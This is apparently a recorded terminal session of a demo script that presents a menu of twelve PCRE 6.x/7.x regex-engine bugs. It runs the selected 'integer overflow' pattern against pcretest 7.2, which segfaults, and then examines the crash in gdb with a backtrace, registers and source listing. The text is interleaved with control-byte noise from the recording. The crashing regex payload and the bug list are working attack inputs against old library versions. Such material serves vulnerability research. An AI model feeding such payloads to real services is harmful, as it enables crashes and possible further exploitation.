>GB: user@vapor|0; >Gn s>GԌ a>G o>G[ u>G] >G1 >G& >G >G>G@P p>GHh w>Gi d>G? >G)@ /demos/pcre >G@: user@vapor|0; >G+s>Go>G,tu>Gn r>G c>G"{ e>GG  >Gl.>G0.>G/>GPBd>GGUe>G m>G( os.sh >G >GǢ: demo@vapor|0; >G h>G a>G n>G- dle_product >GK| >G7kbash: config.sh: line 37: syntax error near unexpected token `(' bash: config.sh: line 37: `function ()' >G|L00. lone \E with trigger char (6.x+) >GC01. matched \E deref (6.x+) >GI02. grouped string with \E (6.x+) >G%H03. \E in character class (7.x+) >GZJ04. not a single char class (7.x+) >GC05. ditto, variation (7.x+) >GÃJ06. optimised cond in group (6.x+) >G<07. variation (6.x+) >G.D08. backtrack too far (6.x+) >GTB09. another variant (6.x+) >GJ10. seeking past end for \c (7.x+) >GB11. integer overflow (7.x) >GB12. integer overflow (7.x) >Gselect vulnerability: >GP1>G1>GQP  >GP "integer overflow (7.x) selected. >GP  >G)Q +payload: /(?i:A{1,}\\6666666666)/\ndata\n >G?Q press enter to run. >GX >G! [1] 29067 >GTIPCRE version 7.2 2007-06-19 >GI re> >GL../demos.sh: line 80: 29069 Segmentation fault (core dumped) /usr/local/encap/pcre-7.2/bin/pcretest <<(echo -e "$payload") >GN-[1]+ Exit 139 ( eval $cmd ) >G}'Core file generated. Opening gdb ... >GeIUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". >G warning: >G7Can't read pathname for load map: Input/output error. >G`GReading symbols from /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0...>Gdone. >GDLoaded symbols for /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0 >GBReading symbols from /usr/local/encap/pcre-7.2/lib/libpcre.so.0...>Gdone. >G[?Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcre.so.0 >Gm4Reading symbols from /lib/tls/i686/cmov/libc.so.6...>GFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...>GAdone. >GBdone. >GVB1Loaded symbols for /lib/tls/i686/cmov/libc.so.6 >GC*Reading symbols from /lib/ld-linux.so.2...>GE6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...>GHdone. >GHdone. >G I'Loaded symbols for /lib/ld-linux.so.2 >G:KACore was generated by `/usr/local/encap/pcre-7.2/bin/pcretest'. >GJK8Program terminated with signal 11, Segmentation fault. >GW#0 0xf7fd98b6 in check_auto_possessive (op_code=0x1c, item=0x41, utf8=0x0, utf8_char=0x0, ptr=0x805301d ")", options=0x1, cd=0xffffb6c8) at pcre_compile.c:1910 >GYZ>1910 return (item != cd->fcc[next]); /* Non-UTF-8 mode */ >GZ>>>GYb>Ggbt>G  >Gϳ #0 0xf7fd98b6 in check_auto_possessive (op_code=0x1c, item=0x41, utf8=0x0, utf8_char=0x0, ptr=0x805301d ")", options=0x1, cd=0xffffb6c8) at pcre_compile.c:1910 >Gv #1 0xf7fdb994 in compile_branch (optionsptr=0xffffa340, codeptr=0xffffa304, ptrptr=0xffffa308, errorcodeptr=0xffffb724, firstbyteptr=0xffffa300, reqbyteptr=0xffffa2fc, >G S bcptr=0xffffa2f0, cd=0xffffb6c8, lengthptr=0xffffa2f8) at pcre_compile.c:3265 >G@ #2 0xf7fde8b2 in compile_regex (options=0x1, oldims=0x0, codeptr=0xffffa494, ptrptr=0xffffa490, errorcodeptr=0xffffb724, lookbehind=0x0, reset_bracount=0x0, skipbytes=0x0, >G firstbyteptr=0xffffa464, reqbyteptr=0xffffa468, bcptr=0xffffa620, cd=0xffffb6c8, lengthptr=0xffffa498) at pcre_compile.c:4998 >G #3 0xf7fde03d in compile_branch (optionsptr=0xffffa670, codeptr=0xffffa634, ptrptr=0xffffa638, errorcodeptr=0xffffb724, firstbyteptr=0xffffa630, reqbyteptr=0xffffa62c, >G? S bcptr=0xffffa620, cd=0xffffb6c8, lengthptr=0xffffa628) at pcre_compile.c:4544 >GҶ #4 0xf7fde8b2 in compile_regex (options=0x0, oldims=0x0, codeptr=0xffffb720, ptrptr=0xffffb71c, errorcodeptr=0xffffb724, lookbehind=0x0, reset_bracount=0x0, skipbytes=0x0, >G | firstbyteptr=0xffffb72c, reqbyteptr=0xffffb728, bcptr=0x0, cd=0xffffb6c8, lengthptr=0xffffb730) at pcre_compile.c:4998 >G #5 0xf7fdf47e in pcre_compile2 (pattern=0x8053009 "(?i:A{1,}\\6666666666)", options=0x0, errorcodeptr=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0xf7ff6500 "") at pcre_compile.c:5589 >G #6 0xf7fdf123 in pcre_compile (pattern=0x8053009 "(?i:A{1,}\\6666666666)", options=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0x0) at pcre_compile.c:5419 >G G#7 0x0804c745 in main (argc=0x1, argv=0xffffd3c4) at pcretest.c:1242 >G7 >>>Gp>Gơ >G- i>G t>G\ e>G1m>G> >G? $1 = 0x41>G? >G?>>>GKi>Gn>G,f>Gso>Gi@ >G}r>G e>Go g>GB >Geax 0x6aa2233b>G 0x6aa2233b >GÓecx 0x29 0x29 >GГ$edx 0xf7ff6600 0xf7ff6600>Gݓ ebx 0xf7ff7a80>G& 0xf7ff7a80 esp 0xffff9f50>G 0xffff9f50 >G&ebp 0xffffa008 0xffffa008 >Gesi 0x41 0x41 >G$edi 0xffffa6d2 0xffffa6d2>G, eip 0xf7fd98b6>GH* 0xf7fd98b6 >GVeflags 0x10297>Gc+ [ CF PF AF SF IF RF ] cs 0x23>Gp 0x23 >G}ss 0x2b 0x2b >Gds 0x2b 0x2b >Ges 0x2b 0x2b>G fs 0x0>G 0x0 gs 0x63>G 0x63 >G>>>Gl>G7 >G 1905 #endif >GK1906 return (unsigned int)item != othercase; 1907 } 1908 else >G!1909 #endif /* SUPPORT_UTF8 */ >GE1910 return (item != cd->fcc[next]); /* Non-UTF-8 mode */ 1911 >GB1912 /* For OP_NOT, "item" must be a single-byte character. */ >G1913 1914 case OP_NOT: >G>>>G  >Gm ;1915 if (next < 0) return FALSE; /* Not a character */ >G '1916 if (item == next) return TRUE; >G T1917 if ((options & PCRE_CASELESS) == 0) return FALSE; 1918 #ifdef SUPPORT_UTF8 >G 1919 if (utf8) 1920 { >G "1921 unsigned int othercase; >G S1922 if (next < 128) othercase = cd->fcc[next]; else 1923 #ifdef SUPPORT_UCP >G 11924 othercase = _pcre_ucp_othercase(next); >G6 >>>G^quit >G: demo@vapor|0; >GD exit